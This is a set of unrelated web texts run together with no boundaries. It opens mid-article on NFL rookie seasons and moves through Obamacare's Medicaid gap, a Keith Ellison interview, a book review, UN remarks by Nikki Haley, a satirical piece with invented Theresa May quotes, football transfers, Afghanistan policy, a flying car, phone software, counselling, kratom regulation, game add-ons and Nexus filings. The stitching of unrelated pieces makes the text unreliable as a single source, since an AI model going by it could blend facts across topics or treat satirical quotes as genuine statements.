The former 2014 John Mackey Award winner and consensus All-American as a senior at Florida State got off to a rough start in his rookie year with the Bills. O'Leary saw limited action during training camp and the preseason and was subsequently cut at the tail end of camp and signed to the practice squad where he remained for most of the season. O'Leary was signed to the active roster for week 14 seeing action in four games catching one pass for just 37 yards.
The All-Time FSU leader among tight ends with 114 receptions, 1,491 yards and 18 touchdowns will need to improve his inline blocking if he hopes to work his way into the Bills rotation at tight end next season and see significant playing time.
Miami Dolphins
Biggest Impact – DeVante Parker, Wide Receiver – Louisville (1st rd pick #14 Overall)
Parker's rookie season got off to a slow start after he had foot surgery in June and took longer than expected to get up to speed with the Dolphins playbook. In his first ten games Parker managed just four receptions for 49 yards.
Parker picked up the production in the final six games of the season and especially after fellow wide out Rishard Matthews was lost for the season due to a rib injury. From week 12 through 17 Parker started four games and caught 22 passes for 445 yards and three touchdowns culminating in his week 17 performance versus the Patriots were he finished with 106 yards and a touchdown. During that span Parker was averaging 11.2 yards per target which was fourth-highest among wide receivers who saw 25 or more targets.
Parker was one of the nation's best deep threats his senior season at Louisville averaging 19.9 yards per reception. With the hiring of new head coach Adam Gase and his familiarity on how to use big receivers like Parker (i.e. Demaryius Thomas, Alshon Jeffery) look for his late season surge to continue into 2016.
Surprise Impact – Jay Ajayi, Running Back – Boise State (5th rd pick #149 Overall)
Ajayi was a highly rated running back coming out of Boise State prior to last year's draft. Some evaluators had him ranked third behind Todd Gurley and Melvin Gordon and if not for a medical test that showed he had no cartilage in his right knee Ajayi would have been selected higher than the 5th round.
Unfortunately for Ajayi and the Dolphins he suffered a cracked rib in Miami's preseason finale and was forced to start the season on Short-term Injured reserve causing him to miss the first seven games of the season.
Ajayi was activated prior to week nine and in nine games had 49 carries for 187 yards and one touchdown. Although those are not eye-popping stats Ajayi, who was splitting carries with Lamar Miller, did show a powerful bruising running-style and the ability to sneak out of the backfield and catch passes.
With Miller set to become a free agent this offseason and the new coaching staff's preference on utilizing more than one back look for Ajayi to have a bigger impact role in the Dolphins backfield next season.
Least Impact – Jordan Phillips, Defensive Tackle – Oklahoma (2nd rd pick #52 Overall)
The former Sooner defensive lineman started four games last season and played in 443 snaps along the Dolphins defensive line. Phillips made little to no impact up front even though he was playing alongside one of the NFL's best defensive tackles in Ndamukong Suh. Phillips registered his first career sack in week one and ended the season with just two to along with his 19 tackles.
Pro Football Focus rated Phillips as the 105th defensive tackle last season. After his rookie campaign Phillips echoed the sentiment that had been whispered around the organization, that he needed to improve his attention to detail and will have to do a better job of preparing during the week.
New York Jets
Biggest Impact – Leonard Williams, Defensive Tackle – USC (1st rd pick #6 Overall)
Prior to last year's draft Williams was often mentioned as a possibility to go anywhere between the second and fourth overall selections, the fact he lasted till the sixth pick was considered one of the surprises in the first round. Lucky for the Jets that Williams was indeed still on the board when their selection came up as later during the summer, right before training camp, they would find out that defensive lineman Sheldon Richardson would be suspended for the first four games of the 2015 season.
Williams helped fill the void left by Richardson's absence at the start of the season along the Jets defensive line. Williams had 63 tackles, 4 sacks, 19 quarterbacks hits, and 30 hurries playing in nearly 800 snaps. According to Pro Football Focus Williams was one of the better run defenders as he registered 35 tackles resulting in a defensive stop, which was 14th most of any interior defensive player last season.
Heading into next season the coaches want Williams to become more of a factor on passing downs encouraging him to work on his technique and hand placement in hopes of generating a more consistent pass rush.
Surprise Impact – Lorenzo Mauldin, Linebacker – Louisville (3rd rd pick #82 Overall)
Mauldin played in 15 games his last season seeing action early on as a member of the special teams unit. It wasn't until week eight versus Jacksonville, when he notched his first two sacks of his career, did Mauldin start receiving more snaps on defense. Against the Jaguars Mauldin displayed the ability to convert speed to power and provide consistent pressure on the quarterback. From then on Mauldin was predominately used as a rush specialist and ended up with 4 sacks, 19 quarterback hits and a forced fumble on the season.
The Jets are expecting Mauldin to have a bigger role on the team next season, but first he will need to work on his run defense along with dropping into coverage before expanding his playing time.
Least Impact – Devin Smith, Wide Receiver – Ohio State (2nd rd pick # 37 Overall)
After selecting Smith in the second round the Jets expected him to bring the element of speed and big play ability to their offense. Smith was figured to be the perfect complement to starters Brandon Marshall and Eric Decker. Smith was coming off a senior season at Ohio State where he scored 12 touchdowns and averaged a whopping 28.2 yards per reception.
Unfortunately Smith's season started off bad when he suffered broken ribs and a partially punctured lung in training camp, costing him the preseason and the first two regular season games.
Then it got worse as Smith tore the ACL in his right knee in week 14 versus the Titans. Smith did manage to play in ten games catching only nine balls for 115 yards and a touchdown.
New England Patriots
Biggest Impact – Malcom Brown, Defensive Tackle – Texas (1st rd pick #32 Overall)
Malcom Brown dropping to the final pick of the first round was not something many expected to happen, in fact some had Brown projected going as high as the top ten. So when he fell to New England he was considered one of the steals of the first round. In New England Brown was looked upon to help fill the void left by the departure of defensive lineman Vince Wilfork.
Brown had a solid rookie season coming on strong towards the end drawing praise from the coaches for his improvement in both fundamentals and technique. Brown started 12 games and finished with 48 tackles, 3 sacks, and 2 forced fumbles.
Starting in week 11 and on Brown played in over 50 % of the defensive snaps and towards the end of the season had emerged as the top defensive tackle on the team.
Surprise Impact – Shaq Mason and Tre Jackson Guards (4th rd picks #131 & # 111 Overall)
The Patriots dealt with a number of injuries along the offensive line this past season and had to rely heavily on these two fourth round picks. Mason and Jackson started a combined 19 games between them, and were part of a three-man rotation, along with Josh Kline, at guard for New England most of the season.
Both Mason and Jackson are powerful at the point-of-contact, show good balance and can play with leverage. Mason is more athletic of the two, and is able to quickly get to the defenses second level. Mason also came from a run-heavy offense in Georgia Tech so his run blocking was a bit more advanced than Jackson's. Jackson played in 54 % of the offensive snaps while Mason tallied about 66 %. Both players look to be long term starters on the inside of the Patriots offensive line come next season.
Least Impact – Jordan Richards, Safety – Stanford (2nd rd pick #64 Overall)
When the Patriots used the 64th overall selection on Stanford safety Jordan Richards, the feeling was they had reached on a player who many had a fourth to fifth round grade on. Although Richards played in 14 regular season games and made two starts, he had minimal impact in any games of consequence for the Pats. Richards was unable to find consistent playing time even though New England was dealing with a number of injuries to their defensive backfield.
Praised by veteran teammates for his maturity, instincts, and speed Richards still has a chance to develop into a starting caliber player for New England. As for his rookie season though, he finished with just 14 tackles, two passes defensed and zero interceptions.
Danny Shimon is a graduate of Introduction to Scouting and Scouting Boot Camp.
Follow Danny on Twitter @dshimon56
Looking for news you can trust?
Subscribe to our free newsletters.
Under Obamacare, if your income is less than 100 percent of the poverty line, you don't qualify to buy subsidized insurance on the exchanges. However, if you miss the subsidy threshold you might still qualify for Medicaid depending on your state's eligibility rules. Unless, that is, your state has refused to participate in Obamacare's Medicaid expansion. In that case you might not qualify for anything.
Dylan Scott has a piece at TPM about health care navigators who have to break this news to people. Here's the saddest passage:
In some cases, those being left out seem to understand, having been left out of the health insurance complex for a while, said Cynthia Rahming, who is heading the Houston, Texas, navigator program. She did agree, though, that her team is “often” coming across people who are part of the Medicaid gap in that state. “They were excited. They were trying to see what's available to them,” she said. “But they're still okay. They know it's just a chance.”
These are poor people. They mostly represent families making less than $20,000 per year. And yet in many cases, they greet the news that they're completely excluded from access to health care with weary acceptance. They probably never really believed that anything good might come their way in the first place. In the meantime, multi-millionaires can virtually bring the government of the United States to a screeching halt over the prospect of a 2 percent increase in the marginal rate they pay in income taxes.
The refusal of Republican states to accept Obamacare's Medicaid expansion surely ranks as one of the most sordid acts in recent American history. The cost to the states is tiny, and the help it would bring to the poor is immense. It's paid for by taxes that residents of these states are going to pay regardless of whether they receive any of the benefits. And yet, merely because it has Obama's name attached to it, they've decided that immiserating millions of poor people is worth it. It's hard to imagine a decision more depraved.
Conservatives hate it when you accuse them of simply not caring about the poor. Sometimes they have a point. This is not one of those times.
UPDATE: Apologies. I originally wrote that this was a problem for people between 100 percent and 138 percent of the poverty line. It's not. Those people qualify for exchange subsidies. It's people above the Medicaid eligibility line (which varies from state to state) but below the poverty line who are getting screwed. If your state sets the eligibility line at, say, 80 percent of the poverty level, then residents between 80 percent and 100 percent of the poverty level are too rich to qualify for Medicaid and too poor to qualify for exchange subsidies. In states that have accepted the Medicaid expansion, everyone under 100 percent of the poverty level qualifies for Medicaid.
I've corrected the text.
Rep. Keith Ellison Wonders Why 'People Care' About His Muslim Faith
Representative Keith Ellison became the first Muslim to be elected to Congress in 2006, and the first person of color elected to represent Minnesota in the national legislature. Along the way he's confronted questions about his faith, patriotism, and even some unpaid parking tickets that nearly derailed his first campaign. He talks about all that in his new book, My Country, 'Tis Of Thee: My Faith, My Family, Our Future.
Interview Highlights
On the controversy over swearing in with a Quran
It did not occur to me that it would be a problem, you know? I don't know what that reflects about me, but when I was asked the question, my primary concern was getting voters out to the polls, not what I was going to swear in on. I hadn't even assumed that I would be swearing in on anything, because the election had not come. And so, I said "well yeah sure, of course I'll swear in on the Quran." Because it occurs to me that if your elected official is one who would want to swear in on a holy book, you'd want them to swear on a holy book they profess to, right? Because that's what makes the oath solemn.
On giving tearful testimony at the House of Representatives
It started out very calm, I was fine. But as I just started thinking about [Mohammad Salman Hamdani, who died during the 9/11 attacks], his mother, so many people I've known who've been yanked off airplanes, had their hjiabs pulled off their head, been stabbed, and had their mosques defaced, and been opposed by zoning commissions, I don't know. Maybe it was just all that that came together in my mind in that moment. I don't know what came over me. I remember when I was done feeling embarrassed and wanting to get out of there.
Graham Austin-King Apr 29, 2016
it was amazing bookshelves: fantasy
Read 2 times. Last read April 29, 2016 to May 11, 2016. 's review
Los Nefilim is a collection of three novellas, though the story reads so well it combines almost seamlessly into a novel. Frohock has produced a masterwork here, weaving a tale of the offspring of angels and daimons and their struggle in the human realm. The story is set in the 1930's Spain and Frohock draws the reader in with ease as the protagonist struggles with his unique heritage of both angel and daimon along with a personal upheaval within his relationship with his partner.
Her worldbuilding is just wonderful. Obviously the book is set within our own world but her take on the nefilim, both angelic and daimonic, is not something I have run across before. Frohock, cleverly, works within our own history but overlays it with an otherwordly struggle taking place behind the scenes. The magic system is intriguing, but not overpowering. This is a race of beings far superior to mankind, yet with all our faults and frailties, and the contrast between the greater strength and the fragile soul is a wonderful thing.
The prose is minimalist and perfect. Frohock doesn't pad. She doesn't use ten words when three will do, and the result is enough to make newer writers weep at her command of the language. The pacing is just marvellous, building towards the threat of a historically obvious confrontation but with enough twists and turns to keep any reader guessing.
Possibly the most impressive aspect however, is Frohock's treatment of her gay main character and his partner. The relationship between the two is written so well, the depth of emotion so obvious, that it somehow manages to make you guilty about any homophobic thought you might have had whilst an ignorant teenager.
The story winds up to a satisfying conclusion yet with enough scope to easily extend out to a full series if the publisher could be persuaded. I can't recommend this collection of novellas enough. Hopefully enough people will snatch up a copy to make the publisher take notice.
US Ambassador to the UN Nikki Haley blasted the UN for its obsession with Israel during an address to the Security Council.
“I just put out to the members of the Security Council to help me understand: When we have so much going on in the world, why is it that every single month we're going to sit down and have a hearing where all they do is obsess over Israel?” Haley asked in a statement which has circulated around the web.
She criticized the Security Council for focusing on Israel during its monthly meeting on the Middle East, to the complete exclusion of other issues, such as Hezbollah, ISIS, and the Syrian civil war. She also criticized the UN Department of Political Affairs for having "an entire division devoted to Palestinian affairs."
"There is no division devoted to illegal missile launches from North Korea. There is no division devoted to the world's number one state-sponsor of terror, Iran," she observed.
"The double standards are breathtaking. Just a few days ago, the United States sought unsuccessfully to have the Security Council condemn a terrorist attack to Israel, where the terrorist opened fire on people waiting for a bus and then stabbed others. The Security Council would not hesitate to condemn an attack like that in any other country. But not for Israel. The statement was blocked. And that's downright shameful.
Haley pledged to work to end the UN's biased treatment of Israel. "I'm here to say the United States will not turn a blind eye to this anymore. I am here to underscore the ironclad support of the United States for Israel. I'm here to emphasize the United States is determined to stand up to the UN's anti-Israel bias. We will never repeat the terrible mistake of Resolution 2334 and allow one-sided Security Council resolutions to condemn Israel. Instead, we will push for action on the real threats we face in the Middle East."
Theresa May and David Davis have today criticised the EU for attempting to influence the British voting public by keeping them dangerously well-informed about the Brexit process.
Speaking to reporters in Downing Street, the prime minister criticised the EU's chief negotiator Michel Barnier.
She claimed Barnier's threat to keep the British people up to speed with how Brexit negotiations are going, and to ensure they are educated about the implications of any deal eventually reached, is an affront to democracy.
May explained, “As we've said all along, we don't want anyone who can actually vote to have even the faintest idea about what is going on behind closed doors in our negotiations with the EU, because that would be very stupid indeed.
“We want everything done in secret, free from media scrutiny and the sort of criticism that could lead voters to think we might not be doing such a bang-up job.
“We have promised the country a deal that is willfully unrealistic, so we need these two years of nothing whatsoever being said about it to ensure we give the people time to forget what we promised them.”
An EU spokesperson said, “There are 27 countries on our side that need to agree on the terms of the Brexit deal, with each country having to sell the deal to their own voters – but sure, if she wants to try and keep the British people in the dark during the whole thing, then good luck to her.
“I've seen your newspapers; I'm sure that soon enough you'll all be convinced that being told absolutely nothing is the best thing for you.”
Get the biggest Liverpool FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Jurgen Klopp has warned Christian Benteke and Liverpool's other outcasts: stay and you won't play.
Klopp wants a leaner squad for the new campaign after using 39 players during Liverpool's 63 matches last season.
The Reds do not have European football and Klopp has told his fringe players they are highly unlikely to figure.
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
The Liverpool boss has advised them to leave and in addition to Benteke, wants to move out Lucas, Adam Bogdan, Tiago Ilori, Mario Balotelli and Lazar Markovic.
"A few things will happen, I'm pretty sure," said the German. "I don't know exactly what but on both sides.
(Image: Getty)
(Image: Liverpool FC via Getty)
"It makes no sense to stay in the squad and be in the squad when you don't have a real opportunity to play.
"When there's no chance to play, it makes absolutely no sense.
"We have a few players, maybe, who want to leave us and I'm pretty sure that will happen. And one or two more players will join us from other clubs.
"It's a long time until the 31st of August and we have to work a little bit."
(Image: Alex Livesey)
Benteke's departure is on hold because Liverpool could not agree a fee with Crystal Palace , who offered £25million for the Belgium international.
(Image: Action Images via Reuters)
Sadio Mane's arrival has demoted Benteke to fifth in the forwards' pecking order and Klopp sees no point keeping players who will not play.
Klopp is using this transfer window to put his stamp on the squad and is continuing his overhaul by bringing in Ragnar Klavan from Augsburg in an initial £4million deal.
He feels Klavan will add experience to his backline and the Estonia centre-half is due at Melwood tomorrow to have his medical.
Danny Ings must feel like another new signing for Klopp because the striker suffered an anterior cruciate ligament injury days after he was appointed boss in October, sidelining him until the final day of last season.
(Image: Action Images via Reuters)
Ings has scored twice in Liverpool's three pre-season friendlies and says he studied Klopp's methods from the sidelines to ensure he hit the ground running this summer.
"The training is very intense, very tactical and we're learning every day," he told Liverpoolfc.com.
"I'm playing catch-up really because I obviously didn't get to train with the manager and the other staff, and get to see the methods.
"What I did do was watch from the sidelines and try to pick up as much as I could. I'm just trying to put that into games now.
"My biggest aim is to get fit and get to how I was before I got injured."
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
First the president spoke to the troops, then to the American people. In a live address from Afghanistan, Barack Obama echoed his predecessor: “I will not keep Americans in harm's way a single day longer than is absolutely required for our national security.”
The echo is not in the language, but the insincerity. It's getting tougher and tougher to argue that policing Afghanistan's civil war has much to do with American national security, particularly after the death one year ago of Osama bin Laden, the al-Qaida poster boy who was found in neighboring Pakistan of all places.
And although he signed a commitment to support the country (and presumably the regime of kleptocrat President Hamid Karzai) until 2024, the president suggested that the age of war — not just the conflict in Afghanistan — was coming to an end.
“As we emerge from a decade of conflict abroad and economic crisis at home, it is time to renew America. An America where our children live free from fear, and have the skills to claim their dreams. A united America of grit and resilience, where sunlight glistens off soaring new towers in downtown Manhattan, and we build our future as one people, as one nation. …
“This time of war began in Afghanistan, and this is where it will end.”
(These quotes are from the president's prepared remarks.)
For proof of his sincerity, Obama cited the other major war he inherited (and though he inherited both, this was the one that didn't hold his interest or support): Iraq. “The Iraq War is over. The number of our troops in harm's way has been cut in half, and more will be coming home soon. We have a clear path to fulfill our mission in Afghanistan, while delivering justice to al-Qaida.”
Just a reminder, to the president and those who read this: Estimates by former CIA chief now-Defense Secretary Leon Panetta had fewer than 100 al-Qaida members left fighting in Afghanistan as of 2010. Do we really need another two years (plus 10 more of support) to get them? Do we really need to get them at all? — PZS
Terrafugia, the Massachusetts-based company founded by graduates of the Massachusetts Institute of Technology, has secured FAA approval to increase the maximum weight of the street-legal Transition light sport aircraft, and to also increase its stall speed beyond normal LSA limits. AOPA supported the company's request for exemption, noting overall safety benefits that come from the tradeoffs.
The FAA received 286 comments on the company's 2014 exemption request, more than 90 percent of which supported increasing the Transition's weight and stall speed to accommodate federal highway safety regulations in addition to FAA requirements.
“Exempting Terrafugia's Transition from the arbitrary LSA weight limit will demonstrate the FAA's willingness to move towards performance-based limitations,” the association noted in comments filed in January 2015. Terrafugia engineers needed to build a heavier aircraft in order to satisfy federal motor vehicle safety requirements, including protection of occupants in a crash. “Unfortunately, the unique nature of the Terrafugia Transition and limitations on maximum road dimensions eliminate the possibility of increasing the wing area to produce additional lift, thus the need for an increased stall speed. It should be noted that according to the petition, even at this increased stall speed, significant stall margin is available to pilots on landing and takeoff.”
The Transition will stall at 54 knots, and the FAA's decision (posted June 17) will allow the Transition to be flown by a sport pilot and used for instruction by a sport pilot CFI. The FAA determined Terrafugia's request was significantly different from those made by other manufacturers seeking an increase of the 1,320-pound LSA weight limit (1,430 pounds for amphibious aircraft), and that the company's design and goals are consistent with the FAA goal of reducing general aviation injuries and fatalities by improving crash survival. The agency determined, based on comments received and its own research, that the Terrafugia design provides a level of safety superior to the mandated minimum LSA standards.
“The willingness of the FAA to consider safety-driven innovation in novel ways, as evidenced by both this Grant of Exemption and the Part 23 rulemaking that is currently underway, is critical to the advancement of the aviation industry,” Terrafugia CEO Carl Dietrich said in a June 21 press release. “We look forward to continuing to work with the FAA to develop products that increase both the safety and utility of personal aviation.”
The company, founded in 2006, aims to succeed where many have failed, creating an aircraft that is both legal to drive on public roads and commercially successful. Development of the next model, the TF-X, which will have vertical takeoff and landing capability thanks to rotating engine pods, is being tested using a remote-controlled scale model. The company received a Section 333 exemption to operate the model in December.
AOPA and industry leaders continue to press the FAA to complete the Part 23 reform process quickly in the interest of increased safety, cost reduction, and increased innovation, which are all among the much-anticipated benefits.
We're pretty excited about this OTA! We've introduced wireless capabilities to the Meizu Pro 5, which gives users the full Ubuntu PC experience running from a smartphone. All the services running from the phone are available on desktop through just a wireless dongle and no cables – giving you the full Ubuntu convergence experience! And the best bit is we'll be rolling this out across all Ubuntu smartphones and tablets for future OTAs. Here's a 2 minute video Richard, our Product Manager, has created showing the magic moment – when the Pro 5 wireless connects!
Watch the PRO 5 wirelessly connect >
In addition to this feature there are overall performance improvements to the M10 tablet that include speed, bluetooth connectivity and smoother scrolling. Here's a more detailed summary of all the updates below:
Pro 5 users have full Ubuntu convergence using the wireless display feature – the same feature will be available for all future Ubuntu smartphones and tablets
Smoother scrolling for the dash and apps giving a more seamless user experience
Better mouse responsiveness using bluetooth when the desktop interface is displayed
Faster smoother graphics which improve the way content is delivered to the device
Automatic scaling for external monitors so the desktop display and application automatically scale to the resolution used on the external monitor
To learn more about all the updates click here.
[Note: I use ‘counselling' and ‘psychotherapy' more or less interchangeably here. Just worth mentioning to avoid any confusion]
In this series of posts, I'm going to outline three of the main therapeutic approaches: Psychodynamic Therapy, Person-Centred Therapy, and Cognitive-Behavioural Therapy (CBT). There are many more approaches and I'll touch briefly on some others, but I've chosen these because they are amongst the most influential. This post is shorter one which just covers the fundamental basics.
*****************
Everyone could do with some counselling, in my opinion.
I'm not saying everyone really needs to go and see a counsellor. Just that everyone could benefit from it.
Some people are lucky enough to have people in their life that they can talk to about anything, and that's awesome. Thing is though, these people care about you. What I mean by that is that it's possible that they are so invested that before long, they'll probably have had enough of you not having a solution to your situation – it might even make them uncomfortable – and they will want to put you out of your misery by giving you all the answers to your problems. Some people will listen to you first and then advise, and others will just jump in with the answer to your problem when you're just wanting to vent.
I know this from experience. I've tried to go properly into ‘counsellor mode' when friends have come to me with a problem, and it's extremely difficult to do properly when it's with someone I know and care about. I can't personally detach myself enough to do it; there'll usually be a point where I just have to butt in (for their own good, obviously) with my own perspective on it and tell them what I think they should do. And there's nothing wrong with that; it's what friends are there for. But it's different from a counselling session.
I know the benefits of counselling from personal experience. I've seen someone in the past when I've been having a really shit time of things and the one thing that struck me was how different it really was from any normal relationship. First of all, it was purely one way traffic: it was all about me. There was no asking the counsellor lady how her day was or anything like that – I did it initially and she answered briefly and then directed the conversation right back at me and my feelings.
It's not the kind of thing you can do in social situations without seeming like a bit of a freak and making people uncomfortable, and so it's not something I'd ever quite experienced before. In an hour of that kind of attention though, you can get a lot done. You can get exploring and figure out – with the counsellor's help – how you really feel about all kinds of things that are on your mind, and get insights into things that you never recognised before. Sometimes (often, I'd say) part of the problem is that you don't really know how you genuinely feel about something (or why you feel that way), and counselling can give you the time and freedom to work that out. You really can talk about anything, too. The counsellor won't be someone you know and they're bound by confidentiality agreements so they'll never pass anything on unless there are extremely serious and immediate concerns about yours or someone else's safety.
Seeing a therapist can be confusing though, not least because there are so many different approaches out there (I count 155 on this Wikipedia page). What's more, the principles of each approach can vary widely and are often not made explicit beforehand. Even when they are though, it's difficult to know what to think about them if you don't know much about them in the first place.
There have been recent studies which suggest that the most important factor in a positive experience in therapy is less to do with the approach chosen and more to do with the relationship between the therapist and the client. This suggests that the approach someone chooses isn't particularly important in the grand scheme of things. I'm hesitant to jump on-board this idea though, and would counter the point by saying that the strength of the relationship itself can depend on how well-suited the client might be to the approach being offered. In any case, some of the major approaches are very different from each other and it's worth people knowing the basics of what they are all about so that they can make an informed decision on what they would prefer.
I started out writing this with the intention of writing a dinky little guide for people, but it's expanded to become a lot longer than I'd planned, so I'm writing it and putting it up in parts to make it more palatable. This is just the introductory post.
First of all: Childhood
Before we look at the differences I want to explore what the approaches have in common and what general psychological principles are agreed across all of them. The main thing common to all these approaches (and most others for that matter) is that childhood experiences have an important impact on a person's development.
This is probably pretty obvious to most people. It's still worth exploring properly though, because it's fundamental to a lot of psychology.
Obviously not everyone talks about their childhood in therapy and sometimes it's not particularly relevant to the issue at hand. If someone has just been through a messy relationship break-up or they're recovering from some other traumatic event in their life, the relevance of their childhood doesn't seem obvious and might never get mentioned – though this depends on the type of therapy you're getting. In any case, it's one of those things that has a massive impact on who we are and how we deal with stresses and obstacles in life, so it's worth looking at.
An Evolutionary Context
The crucial thing to recognise here is that as mammals, we are a species in which our young children are completely dependent on their parents for a very long time after their birth. We're not like spiders, that lay a thousand or so eggs, protect the eggs and then give the individual baby spiders relatively little attention once they're hatched.
I'm not having a dig at spiders here. They can get away with not being so bothered about their kids because they have a thousand of them. Even when they go off and leave them to it, they can be pretty safe that at least a few of them survive and that their genes will continue. The name of the evolutionary game is survival, and if a spider cared about each their kids in the same way that humans do it'd probably die of stress within a few seconds of them all being born, which wouldn't be good for survival.
Humans are in a different predicament though. Human babies have a nine-month incubation period and you usually can only have one at a time. This makes the stakes a lot higher. The name of the game is still survival, just like it is with the spider, but we've got a totally different way of playing it. In this case, it's in our best interests to really care about the kid that we've created.
Babies themselves have adapted to this situation too though, and human babies have an overwhelmingly strong tendency to become attached to their primary caregiver because it makes them more likely to survive. Furthermore because they rely so heavily on their parents, they've adapted to look out for clues as to what behaviours are most likely to ensure their parents' love (and hence their own survival), and what is likely to upset their parents. So certain behaviours, feelings, inclinations in themselves will naturally become prominent as a result of the clues they get, while others will be buried.
This is all well and good, but the thing is that parents aren't robots. All people (parents or otherwise) have certain idiosyncrasies – certain behaviours or emotions which they don't like, and others that they're more comfortable with – which make up who they are. It's not always rational or even particularly sensible, but it's there nevertheless. The sources of these idiosyncrasies could be from their own upbringing, their genes, or a mixture of both. The name of the game is still survival though, and the kid will pick up on clues for survival which arise purely from their parent's idiosyncrasies.
These clues are picked up on and these lessons are learned without the kid being aware of most of it. If they were aware though, this is an example of how they almost certainly wouldn't think:
“My parents are really strange about anger. I better not express my anger around them in order to survive living here, but there are other people in this world who are cool with anger and who I can express it with when the time comes.”
That's not how it works. Kids aren't aware of the world at large in that way; they have no frame of reference for these lessons that they're learning. As a result, they tend to generalise the lessons they learn from their parents. So the lesson is more like:
“Anger gets me into trouble. I better not show my anger.”
Or even:
“Anger causes pain. Anger is a bad emotion. Therefore I should never feel angry, ever.”
So these aren't just lessons that apply when dealing with their parents. As far as the kid is concerned, this is reality. The kid doesn't know any different, and so they will generally just adapt to these clues and live by them thinking that this is just how the world is in general. So kids become cut off from certain areas of themselves in order to survive.
The lesson might not necessarily be that anger is bad, either. Maybe it's sadness that shouldn't be felt. Maybe it's assertiveness that's so terrible. Maybe it's happiness. Maybe sexuality, or thinking that you're a good person, or whatever. There is no end to it. There is also no end to the number of different lessons different children could learn from the same circumstances too, as people can interpret things in different ways. One of the most fascinating things I find about psychology is the infinite number of ways people can react to their circumstances.
Back to Therapy
Literally everyone has gone through this process, and remember that kids aren't aware that it's happening – it's unconscious. There's nothing wrong with it either – it's just the natural course of life. For most people it never really becomes an issue – their past has an impact on who they are, sure, but they like who they are and they're happy enough, so it's no big deal. Some people can run into issues though when the lessons learned stick with us long after they have become out of date. When sadness, or anger, for example, isn't acknowledged, it can cause issues because sadness and anger are both extremely useful tools for dealing with certain things; there is a good reason for us having them in our repertoire. See the movie ‘Inside Out' and all the shit that happens because sadness is seen as a ‘bad' thing to feel, for example. When certain feelings aren't acknowledged, it can sometimes begin to have a negative impact on how well we cope with the stresses of life.
The general process set out above is almost universally recognised, although different approaches place a different emphasis on it. For example, some approaches focus almost solely on making conscious some of the lessons learned in childhood and see that as the way to treat people (Psychodynamic), while other approaches see the past as little more than background noise; something that gives context to one's current issues but which there is no point in focusing on for its own sake (CBT). Different approaches also use different frames of reference and terminology to describe this process, but as far as I can see the basic premise described above isn't really contended by any of the approaches.
With the groundwork sorted, I'll get on with looking at each individual approach and how they different from each other. In the next post(s) I'll be exploring how Psychodynamic, Client-Centred and Cognitive-Behavioural therapies all developed, how they view the therapeutic process and what therapy in each of these approaches is likely to be like.
Advertisements
On September 12 CRE sent a letter ( cre-dea-kratom-1 ) which contains a roadmap for the Drug Enforcement Administration to address the alleged problems with kratom through the adoption of a transparent and public process.
CRE concluded in the aforementioned letter:
However in this instance, the DEA action to ban Kratom, the conflict is considerably wider in scope. In this instance there is a sharp disagreement among a number of federal agencies. Consequently if there were ever a time for an OMB intervention this is it.
CRE recommends the following:
CRE is requesting that the DEA take the following actions, none of which prejudge the final status of Mitragynine and 7-Hydroxymitragynine:
1. Extend the effective date for placing kratom into schedule I until July, 1, 2017.
2. Open a Federal Register notice-and-comment proceeding on placing kratom into Schedule I and inform the public that the DEA's proposal is a “significant regulatory action” under Executive Order 12866 because it,
a) Has an annual effect on the economy of $100 million or more or
b) Creates a serious inconsistency with an action taken by another agency, FDA, or
c) Raises novel legal and policy issues arising out of legal mandates.
3. Submit the proposed listing to OMB for review pursuant to Executive Order 12866.
4. Inform the US-Canada Regulatory Cooperation Council (RCC) via OMB of DEA's intent to place kratom on schedule I and seek its comments.
5. Conduct an interagency peer review of DEA's science which lead to a Schedule I'm listing of kratom as required by the HISA requirements of the Data (Information) Quality Act
Also see comments on this page.
Warner Bros. has released a final trailer highlighting Batman: Arkham Knight's new 1989 Movie Batmobile Pack which is available to download today for $1.99. But towards the end, we get a first look at next month's DLC… The Dark Knight Batmobile, aka The Tumbler! Hopefully we get a Christian Bale Batman skin to go along with it, just like we did for Michael Keaton. Check out all the official details below.
Advertisement
With the 1989 Movie Batmobile Pack, you can get behind the wheel of the Batmobile from the 1989 film ‘Batman' and outfit Batman with a customized skin from the film. The pack also gives you access to two racetracks inspired by the film's sequel ‘Batman Returns'. In addition, if you successfully clear the streets of the Arkham Knight's drone tanks, you can take the Batmobile for a spin on the streets of Gotham City.
Separately, the Bat-Family Skin Pack includes 6 skins based on the alternate timelines of your favorite characters including 1990s Catwoman, One Year Later Robin, Arkham Origins Batman, Iconic Grey & Black Batman, 1970s Batman and the Original Arkham Nightwing.
This content will be available beginning today for fans who have purchased the Batman: Arkham Knight Season Pass for the PlayStation®4 computer entertainment system and Xbox One, and are connected to the Internet. The content can also be purchased a la carte beginning today for $1.99 MSRP on the PlayStation®Network and Xbox LIVE online entertainment network from Microsoft.
Stay tuned for new Batman: Arkham Knight downloadable content coming in September including:
It's been reported that this year's Nexus devices will be built by HTC for quite a while now. We've had recreations, we've had photos, and now we've got FCC certifications. These applications were granted earlier today for both Sailfish and Marlin.
Although these labels don't look like they'd tell us much, we can learn a few things from them. First off, we now have further confirmation that there will be two Nexus models. From the weights listed, it's clear that G-2PW4100 is the larger Marlin, while G-2PW2100 is the smaller Sailfish. In addition, the font of the labels looks very similar to that of Google's new logo. The "G" in front of both model names is also an indication that these were made in partnership with our favorite Mountain View-based company.
If you're still not convinced that these are Nexus devices, have a look at these user guide declarations. In them, HTC project manager Sean Shih confirms that "the final (user guide) will be made publicly available on Google's website (http://support.google.com/nexus) at the time the product is commercially released."
G-2PW2100, and consequently G-2PW4100, will support LTE bands 2/45/7/12/13/17/25/26/30/41, WiFi 802.11 a/b/g/n/ac, Bluetooth LE (Low Energy), and NFC (for that sweet Android Pay goodness).
According to this chart, CDMA is supported as well, so expect to see Verizon, Sprint, and Fi Network compatibility. That means that the new Nexuses should work on every single US network.
We can also glean from the kernel version (3.18.24-g67d1673-dirty) that this is a pretty new software build.
Unfortunately, there's not too much stuff here that the average Android Police reader would find interesting. There are no pictures attached to these FCC listings, but we did just post a few.
The Sumerians. The Sumerian King List
The world is full of unexplainable things, illogical structures and enigmatic artifacts. Strange, but even today, in the era of developed civilization, the era of scientific breakthroughs and opportunities, we can't explain all the mysteries of our world. I've been always interested in such things, tried to watch different TV programs to know new versions when I was little. Since then I ceased to follow it, but still I peer into such themes sometimes.
